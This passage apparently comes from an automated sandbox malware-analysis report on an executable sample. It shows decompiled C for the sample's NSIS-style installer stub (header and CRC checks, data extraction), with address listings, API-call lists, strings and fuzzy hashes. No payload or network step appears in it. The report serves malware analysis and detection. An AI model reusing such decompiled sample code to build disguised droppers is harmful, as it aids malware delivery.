							E004054E4(_t78);
							goto L15;
						}
						_t96 = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}



























                                                                      0x00403534
                                                                      0x00403545
                                                                      0x0040354c
                                                                      0x0040354e
                                                                      0x00403562
                                                                      0x00403567
                                                                      0x0040357d
                                                                      0x00403582
                                                                      0x00403588
                                                                      0x0040359a
                                                                      0x0040359a
                                                                      0x004035a5
                                                                      0x00403550
                                                                      0x0040355b
                                                                      0x0040355b
                                                                      0x004035aa
                                                                      0x004035b4
                                                                      0x004035bd
                                                                      0x004035c9
                                                                      0x0040364f
                                                                      0x00403657
                                                                      0x00403659
                                                                      0x0040365f
                                                                      0x00403660
                                                                      0x00403660
                                                                      0x00403676
                                                                      0x0040367c
                                                                      0x0040368a
                                                                      0x00403719
                                                                      0x00403721
                                                                      0x0040372b
                                                                      0x00403730
                                                                      0x00403736
                                                                      0x004037c8
                                                                      0x004037cd
                                                                      0x004037cf
                                                                      0x004037eb
                                                                      0x00000000
                                                                      0x004037eb
                                                                      0x004037d1
                                                                      0x004037d7
                                                                      0x004037df
                                                                      0x004037df
                                                                      0x00000000
                                                                      0x004037d7
                                                                      0x00403744
                                                                      0x00403750
                                                                      0x00403756
                                                                      0x00403758
                                                                      0x0040375a
                                                                      0x0040375d
                                                                      0x00403766
                                                                      0x00403766
                                                                      0x0040376e
                                                                      0x00403776
                                                                      0x00403778
                                                                      0x0040377a
                                                                      0x0040377f
                                                                      0x00403785
                                                                      0x00403788
                                                                      0x0040378e
                                                                      0x00403795
                                                                      0x00403795
                                                                      0x004037b4
                                                                      0x004037be
                                                                      0x00000000
                                                                      0x004037c3
                                                                      0x00403723
                                                                      0x00403725
                                                                      0x00000000
                                                                      0x00403690
                                                                      0x00403690
                                                                      0x00403696
                                                                      0x004036a0
                                                                      0x004036a8
                                                                      0x004036b2
                                                                      0x004036b8
                                                                      0x004036c6
                                                                      0x004037f0
                                                                      0x004037f0
                                                                      0x00000000
                                                                      0x004037f0
                                                                      0x004036cc
                                                                      0x004036d5
                                                                      0x00403714
                                                                      0x00000000
                                                                      0x00403714
                                                                      0x004035cf
                                                                      0x004035cf
                                                                      0x004035d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004035de
                                                                      0x004035ed
                                                                      0x004035f2
                                                                      0x004035f9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004035fd
                                                                      0x004035ff
                                                                      0x0040360c
                                                                      0x0040360c
                                                                      0x00403614
                                                                      0x0040361a
                                                                      0x00403642
                                                                      0x0040364a
                                                                      0x00000000
                                                                      0x0040362c
                                                                      0x0040362d
                                                                      0x00403636
                                                                      0x0040363c
                                                                      0x0040363d
                                                                      0x00000000
                                                                      0x0040363d
                                                                      0x00403638
                                                                      0x0040363a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040363a
                                                                      0x0040361a

                                                                      APIs
                                                                        • Part of subcall function 00405CAA: GetModuleHandleA.KERNEL32(000000F1,0040570A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CAE
                                                                        • Part of subcall function 00405CAA: LoadLibraryA.KERNEL32(000000F1,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CBC
                                                                        • Part of subcall function 00405CAA: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                      • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,?,00000000,0040332B,?), ref: 004035A5
                                                                      • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,C:\Users\user\AppData\Local\Temp,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,KERNEL32.dll,GetUserDefaultUILanguage,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ), ref: 0040360F
                                                                      • lstrcmpiA.KERNEL32(?,.exe,0042DFC0,?,?,?,0042DFC0,C:\Users\user\AppData\Local\Temp,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,KERNEL32.dll,GetUserDefaultUILanguage), ref: 00403622
                                                                      • GetFileAttributesA.KERNEL32(0042DFC0,?,00000000,0040332B,?), ref: 0040362D
                                                                      • LoadImageA.USER32 ref: 00403676
                                                                      • RegisterClassA.USER32 ref: 004036BD
                                                                        • Part of subcall function 00405902: wsprintfA.USER32 ref: 0040590F
                                                                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D5
                                                                      • CreateWindowExA.USER32 ref: 0040370E
                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,0040332B,?), ref: 00403744
                                                                      • LoadLibraryA.KERNEL32(RichEd20.dll,?,00000000,0040332B,?), ref: 00403756
                                                                      • LoadLibraryA.KERNEL32(RichEd20.dll,?,00000000,0040332B,?), ref: 00403766
                                                                      • GetClassInfoA.USER32 ref: 00403776
                                                                      • GetClassInfoA.USER32 ref: 00403785
                                                                      • RegisterClassA.USER32 ref: 00403795
                                                                      • DialogBoxParamA.USER32 ref: 004037B4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$RichEd20.dll$RichEdit20A$_Nb
                                                                      • API String ID: 914957316-2346161888
                                                                      • Opcode ID: 3bf7bc9d91704f54ca423aa9b2768270c7771e3ef50ab5c65afc550e0dda3af6
                                                                      • Instruction ID: ab409947a1a018540ba4f647caeb8d994822170a27dd8cdc698d056a643aef84
                                                                      • Opcode Fuzzy Hash: 3bf7bc9d91704f54ca423aa9b2768270c7771e3ef50ab5c65afc550e0dda3af6
                                                                      • Instruction Fuzzy Hash: DD61C6B1A04340BED320AF65AD45E273AACEB45749B84483FF545B32E2D73C9D018A3E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402C3A, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190memoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 81%
                                                                      			E00402C3A(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				long _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t50;
				signed int _t54;
				void* _t60;
				intOrPtr* _t62;
				long _t63;
				signed int _t68;
				signed int _t73;
				signed int _t74;
				long _t79;
				signed int _t84;
				intOrPtr _t87;
				void* _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t95;
				signed int _t98;
				intOrPtr* _t99;

				_v8 = 0;
				_t50 = GetTickCount();
				_t97 = "C:\\Users\\hardz\\Desktop";
				_t95 = _t50 + 0x3e8;
				_v16 = 0;
				_v12 = 0;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop", 0x400);
				_t90 = E00405680(_t97, 0x80000000, 3);
				_v20 = _t90;
				 *0x409020 = _t90;
				if(_t90 == 0xffffffff) {
					return "Error launching installer";
				}
				E004054E4(_t97);
				_t54 = GetFileSize(_t90, 0);
				__eflags = _t54;
				 *0x428c38 = _t54;
				_t98 = _t54;
				if(_t54 <= 0) {
					L27:
					__eflags =  *0x42f02c;
					if( *0x42f02c == 0) {
						goto L32;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L31:
						_t99 = GlobalAlloc(0x40, _v28);
						E00403112( *0x42f02c + 0x1c);
						_push(_v28);
						_push(_t99);
						_push(0);
						_push(0xffffffff);
						_t60 = E00402EB4();
						__eflags = _t60 - _v28;
						if(_t60 == _v28) {
							__eflags = _v48 & 0x00000001;
							 *0x42f028 = _t99;
							 *0x42f030 =  *_t99;
							if((_v48 & 0x00000001) != 0) {
								 *0x42f034 =  *0x42f034 + 1;
								__eflags =  *0x42f034;
							}
							_t47 = _t99 + 0x44; // 0x44
							_t62 = _t47;
							_t92 = 8;
							do {
								_t62 = _t62 - 8;
								 *_t62 =  *_t62 + _t99;
								_t92 = _t92 - 1;
								__eflags = _t92;
							} while (_t92 != 0);
							_t63 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t99 + 0x3c) = _t63;
							E00405641(0x42f040, _t99 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L32;
					}
					E00403112( *0x414c30);
					_t68 = E004030E0( &_a4, 4); // executed
					__eflags = _t68;
					if(_t68 == 0) {
						goto L32;
					}
					__eflags = _v16 - _a4;
					if(_v16 != _a4) {
						goto L32;
					}
					goto L31;
				} else {
					do {
						_t91 = _t98;
						asm("sbb eax, eax");
						_t73 = ( ~( *0x42f02c) & 0x00007e00) + 0x200;
						__eflags = _t98 - _t73;
						if(_t98 >= _t73) {
							_t91 = _t73;
						}
						_t74 = E004030E0(0x420c38, _t91); // executed
						__eflags = _t74;
						if(_t74 == 0) {
							__eflags = _v8;
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L32:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						__eflags =  *0x42f02c;
						if( *0x42f02c != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								__eflags = _v8;
								if(_v8 == 0) {
									_t79 = GetTickCount();
									__eflags = _t79 - _t95;
									if(_t79 > _t95) {
										_v8 = CreateDialogParamA( *0x42f020, 0x6f, 0, E00402BAE, "verifying installer: %d%%");
									}
								} else {
									E00405CD4(0);
								}
							}
							goto L22;
						}
						E00405641( &_v48, 0x420c38, 0x1c);
						_t84 = _v48;
						__eflags = _t84 & 0xfffffff0;
						if((_t84 & 0xfffffff0) != 0) {
							goto L22;
						}
						__eflags = _v44 - 0xdeadbeef;
						if(_v44 != 0xdeadbeef) {
							goto L22;
						}
						__eflags = _v32 - 0x74736e49;
						if(_v32 != 0x74736e49) {
							goto L22;
						}
						__eflags = _v36 - 0x74666f73;
						if(_v36 != 0x74666f73) {
							goto L22;
						}
						__eflags = _v40 - 0x6c6c754e;
						if(_v40 != 0x6c6c754e) {
							goto L22;
						}
						_a4 = _a4 | _t84;
						_t93 =  *0x414c30; // 0xcbdc3
						 *0x42f0c0 =  *0x42f0c0 | _a4 & 0x00000002;
						_t87 = _v24;
						__eflags = _t87 - _t98;
						 *0x42f02c = _t93;
						if(_t87 > _t98) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t25 = _t87 - 4; // 0x4032c1
							_t98 = _t25;
							__eflags = _t91 - _t98;
							if(_t91 > _t98) {
								_t91 = _t98;
							}
							goto L22;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L15;
						L22:
						__eflags = _t98 -  *0x428c38; // 0xcbdc7
						if(__eflags < 0) {
							_v16 = E00405D07(_v16, 0x420c38, _t91);
						}
						 *0x414c30 =  *0x414c30 + _t91;
						_t98 = _t98 - _t91;
						__eflags = _t98;
					} while (_t98 > 0);
					__eflags = _v8;
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                                                      0x00402c45
                                                                      0x00402c48
                                                                      0x00402c4e
                                                                      0x00402c5c
                                                                      0x00402c62
                                                                      0x00402c65
                                                                      0x00402c68
                                                                      0x00402c7b
                                                                      0x00402c80
                                                                      0x00402c83
                                                                      0x00402c89
                                                                      0x00000000
                                                                      0x00402c8b
                                                                      0x00402c96
                                                                      0x00402c9e
                                                                      0x00402ca4
                                                                      0x00402ca6
                                                                      0x00402cab
                                                                      0x00402cad
                                                                      0x00402def
                                                                      0x00402df1
                                                                      0x00402df7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402df9
                                                                      0x00402dfc
                                                                      0x00402e20
                                                                      0x00402e2b
                                                                      0x00402e36
                                                                      0x00402e3b
                                                                      0x00402e3e
                                                                      0x00402e3f
                                                                      0x00402e40
                                                                      0x00402e42
                                                                      0x00402e47
                                                                      0x00402e4a
                                                                      0x00402e64
                                                                      0x00402e68
                                                                      0x00402e70
                                                                      0x00402e75
                                                                      0x00402e77
                                                                      0x00402e77
                                                                      0x00402e77
                                                                      0x00402e7f
                                                                      0x00402e7f
                                                                      0x00402e82
                                                                      0x00402e83
                                                                      0x00402e83
                                                                      0x00402e86
                                                                      0x00402e88
                                                                      0x00402e88
                                                                      0x00402e88
                                                                      0x00402e92
                                                                      0x00402e98
                                                                      0x00402ea6
                                                                      0x00402eab
                                                                      0x00000000
                                                                      0x00402eab
                                                                      0x00000000
                                                                      0x00402e4a
                                                                      0x00402e04
                                                                      0x00402e0f
                                                                      0x00402e14
                                                                      0x00402e16
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402e1b
                                                                      0x00402e1e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402cb3
                                                                      0x00402cb3
                                                                      0x00402cb8
                                                                      0x00402cbc
                                                                      0x00402cc3
                                                                      0x00402cc8
                                                                      0x00402cca
                                                                      0x00402ccc
                                                                      0x00402ccc
                                                                      0x00402cd4
                                                                      0x00402cd9
                                                                      0x00402cdb
                                                                      0x00402e53
                                                                      0x00402e57
                                                                      0x00402e5c
                                                                      0x00402e5c
                                                                      0x00402e4c
                                                                      0x00000000
                                                                      0x00402e4c
                                                                      0x00402ce3
                                                                      0x00402ce9
                                                                      0x00402d7d
                                                                      0x00402d81
                                                                      0x00402d83
                                                                      0x00402d86
                                                                      0x00402d90
                                                                      0x00402d96
                                                                      0x00402d98
                                                                      0x00402db4
                                                                      0x00402db4
                                                                      0x00402d88
                                                                      0x00402d89
                                                                      0x00402d89
                                                                      0x00402d86
                                                                      0x00000000
                                                                      0x00402d81
                                                                      0x00402cfa
                                                                      0x00402cff
                                                                      0x00402d02
                                                                      0x00402d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d0d
                                                                      0x00402d14
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d1a
                                                                      0x00402d21
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d27
                                                                      0x00402d2e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d34
                                                                      0x00402d3b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d3d
                                                                      0x00402d43
                                                                      0x00402d4c
                                                                      0x00402d52
                                                                      0x00402d55
                                                                      0x00402d57
                                                                      0x00402d5d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402d63
                                                                      0x00402d67
                                                                      0x00402d6f
                                                                      0x00402d6f
                                                                      0x00402d72
                                                                      0x00402d72
                                                                      0x00402d75
                                                                      0x00402d77
                                                                      0x00402d79
                                                                      0x00402d79
                                                                      0x00000000
                                                                      0x00402d77
                                                                      0x00402d69
                                                                      0x00402d6d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402db7
                                                                      0x00402db7
                                                                      0x00402dbd
                                                                      0x00402dcd
                                                                      0x00402dcd
                                                                      0x00402dd0
                                                                      0x00402dd6
                                                                      0x00402dd8
                                                                      0x00402dd8
                                                                      0x00402de0
                                                                      0x00402de4
                                                                      0x00402de9
                                                                      0x00402de9
                                                                      0x00000000
                                                                      0x00402de4

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402C48
                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop,00000400,?,?,?,?,?,?,004032C5,?), ref: 00402C68
                                                                        • Part of subcall function 00405680: GetFileAttributesA.KERNELBASE(00000003,00402C7B,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 00405684
                                                                        • Part of subcall function 00405680: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,?,004032C5,?), ref: 004056A6
                                                                      • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 00402C9E
                                                                      • DestroyWindow.USER32(00000000,00420C38,00000000,?,?,?,?,?,?,004032C5,?), ref: 00402DE9
                                                                      • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,004032C5,?), ref: 00402E25
                                                                      Strings
                                                                      • Null, xrefs: 00402D34
                                                                      • Inst, xrefs: 00402D1A
                                                                      • Error launching installer, xrefs: 00402C8B
                                                                      • soft, xrefs: 00402D27
                                                                      • "C:\Users\user\Desktop\aaVb1xEmrd.exe" , xrefs: 00402C41
                                                                      • verifying installer: %d%%, xrefs: 00402D9A
                                                                      • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402E4C
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C44
                                                                      • C:\Users\user\Desktop, xrefs: 00402C4E, 00402C5A, 00402C75, 00402C95
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                                      • API String ID: 2181728824-3178254277
                                                                      • Opcode ID: 5d902e2cbd0d5d68523bb18f4138170b908570dc3ca78ff5000b6e56de227859
                                                                      • Instruction ID: ac1a186a9ee24618264e6cd89058a0a33b03ee754d8ef6c6ef55bcd8238f1df4
                                                                      • Opcode Fuzzy Hash: 5d902e2cbd0d5d68523bb18f4138170b908570dc3ca78ff5000b6e56de227859
                                                                      • Instruction Fuzzy Hash: AC61A131E40204EBDB219FA5DE49B9EBAB4EF04754F60813BE500B62D2D7B89D45CB9C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402EB4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 176fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 95%
                                                                      			E00402EB4(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				void* _t69;
				long _t75;
				intOrPtr _t80;
				long _t81;
				void* _t83;
				int _t85;
				void* _t98;
				void* _t101;
				long _t102;
				signed int _t103;
				long _t104;
				int _t105;
				intOrPtr _t106;
				long _t107;
				void* _t108;

				_t103 = _a16;
				_t98 = _a12;
				_v12 = _t103;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x418c38;
				}
				_t66 = _a4;
				if(_a4 >= 0) {
					E00403112( *0x42f078 + _t66);
				}
				_t68 = E004030E0( &_a16, 4); // executed
				if(_t68 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 == 0) {
							while(_a16 > 0) {
								_t104 = _v12;
								if(_a16 < _t104) {
									_t104 = _a16;
								}
								if(E004030E0(0x414c38, _t104) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c38, _t104,  &_a12, 0) == 0 || _t104 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t69);
										return _t69;
									} else {
										_v8 = _v8 + _t104;
										_a16 = _a16 - _t104;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t103) {
							_t103 = _a16;
						}
						if(E004030E0(_t98, _t103) != 0) {
							_v8 = _t103;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t75 = GetTickCount();
					 *0x40b55c =  *0x40b55c & 0x00000000;
					 *0x40b558 =  *0x40b558 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t75;
					 *0x40b040 = 8;
					 *0x414be8 = 0x40cbe0;
					 *0x414be4 = 0x40cbe0;
					 *0x414be0 = 0x414be0;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t105 = 0x4000;
						if(_a16 < 0x4000) {
							_t105 = _a16;
						}
						if(E004030E0(0x414c38, _t105) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t105;
						 *0x40b030 = 0x414c38;
						 *0x40b034 = _t105;
						while(1) {
							_t101 = _v16;
							 *0x40b038 = _t101;
							 *0x40b03c = _v12;
							_t80 = E00405D75(0x40b030);
							_v28 = _t80;
							if(_t80 < 0) {
								break;
							}
							_t106 =  *0x40b038; // 0x41a9fd
							_t107 = _t106 - _t101;
							_t81 = GetTickCount();
							_t102 = _t81;
							if(( *0x40928c & 0x00000001) != 0 && (_t81 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t108 = _t108 + 0xc;
								E00404D69(0,  &_v92);
								_v20 = _t102;
							}
							if(_t107 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v12 = _v12 - _t107;
									_v8 = _v8 + _t107;
									_t83 =  *0x40b038; // 0x41a9fd
									_v16 = _t83;
									if(_v12 < 1) {
										goto L45;
									}
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t85 = WriteFile(_a8, _v16, _t107,  &_v24, 0); // executed
								if(_t85 == 0 || _v24 != _t107) {
									goto L29;
								} else {
									_v8 = _v8 + _t107;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}


























                                                                      0x00402ebc
                                                                      0x00402ec0
                                                                      0x00402ec3
                                                                      0x00402ec8
                                                                      0x00402eca
                                                                      0x00402eca
                                                                      0x00402ed1
                                                                      0x00402ed5
                                                                      0x00402eda
                                                                      0x00402edc
                                                                      0x00402edc
                                                                      0x00402ee3
                                                                      0x00402ee8
                                                                      0x00402ef3
                                                                      0x00402ef3
                                                                      0x00402efe
                                                                      0x00402f05
                                                                      0x0040308b
                                                                      0x0040308b
                                                                      0x00000000
                                                                      0x00402f0b
                                                                      0x00402f0f
                                                                      0x00403076
                                                                      0x004030cb
                                                                      0x00403090
                                                                      0x00403096
                                                                      0x00403098
                                                                      0x00403098
                                                                      0x004030a9
                                                                      0x00000000
                                                                      0x004030ab
                                                                      0x004030be
                                                                      0x00403070
                                                                      0x00403070
                                                                      0x0040308d
                                                                      0x0040308d
                                                                      0x00000000
                                                                      0x004030c5
                                                                      0x004030c5
                                                                      0x004030c8
                                                                      0x00000000
                                                                      0x004030c8
                                                                      0x004030be
                                                                      0x004030a9
                                                                      0x004030d6
                                                                      0x00000000
                                                                      0x004030d6
                                                                      0x0040307b
                                                                      0x0040307d
                                                                      0x0040307d
                                                                      0x00403089
                                                                      0x004030d3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403089
                                                                      0x00402f1b
                                                                      0x00402f1d
                                                                      0x00402f24
                                                                      0x00402f2b
                                                                      0x00402f2b
                                                                      0x00402f32
                                                                      0x00402f3a
                                                                      0x00402f44
                                                                      0x00402f49
                                                                      0x00402f51
                                                                      0x00402f5b
                                                                      0x00402f5e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402f64
                                                                      0x00402f64
                                                                      0x00402f64
                                                                      0x00402f6c
                                                                      0x00402f6e
                                                                      0x00402f6e
                                                                      0x00402f7f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402f85
                                                                      0x00402f88
                                                                      0x00402f8e
                                                                      0x00402f94
                                                                      0x00402f94
                                                                      0x00402f9f
                                                                      0x00402fa5
                                                                      0x00402faa
                                                                      0x00402fb1
                                                                      0x00402fb4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00402fba
                                                                      0x00402fc0
                                                                      0x00402fc2
                                                                      0x00402fcb
                                                                      0x00402fcd
                                                                      0x00402ffb
                                                                      0x00403001
                                                                      0x0040300a
                                                                      0x0040300f
                                                                      0x0040300f
                                                                      0x00403016
                                                                      0x00403064
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403018
                                                                      0x0040301b
                                                                      0x0040303d
                                                                      0x00403040
                                                                      0x00403043
                                                                      0x0040304c
                                                                      0x0040304f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403055
                                                                      0x00403059
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040305f
                                                                      0x00403029
                                                                      0x00403031
                                                                      0x00000000
                                                                      0x00403038
                                                                      0x00403038
                                                                      0x00000000
                                                                      0x00403038
                                                                      0x00403031
                                                                      0x00403016
                                                                      0x0040306c
                                                                      0x00000000
                                                                      0x0040306c
                                                                      0x00000000
                                                                      0x00402f64

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402F1B
                                                                      • GetTickCount.KERNEL32 ref: 00402FC2
                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00402FEB
                                                                      • wsprintfA.USER32 ref: 00402FFB
                                                                      • WriteFile.KERNELBASE(00000000,00000000,0041A9FD,7FFFFFFF,00000000), ref: 00403029
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CountTick$FileWritewsprintf
                                                                      • String ID: ... %d%%$8LA$8LA
                                                                      • API String ID: 4209647438-2839151062
                                                                      • Opcode ID: f9f5fb98028ea68bc9b92fb94d4a45197e988c3c07679da176d4706a4b7c1ea4
                                                                      • Instruction ID: 88e293ae79e6b65d43497011603f5605762881a31d59c16dd02ed21a4dce8fc4
                                                                      • Opcode Fuzzy Hash: f9f5fb98028ea68bc9b92fb94d4a45197e988c3c07679da176d4706a4b7c1ea4
                                                                      • Instruction Fuzzy Hash: 7F618E71902219EBCF10CF65DA48B9F7BB8EB40796F10417BE910B72D4D3789A40CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401799, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 68%
                                                                      			E00401799(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				CHAR* _t81;
				void* _t83;
				void* _t85;

				_t75 = __ebx;
				_t81 = E00402A9D(0x31);
				 *(_t85 - 0x34) = _t81;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E00405509(_t81);
				_push(_t81);
				if(_t33 == 0) {
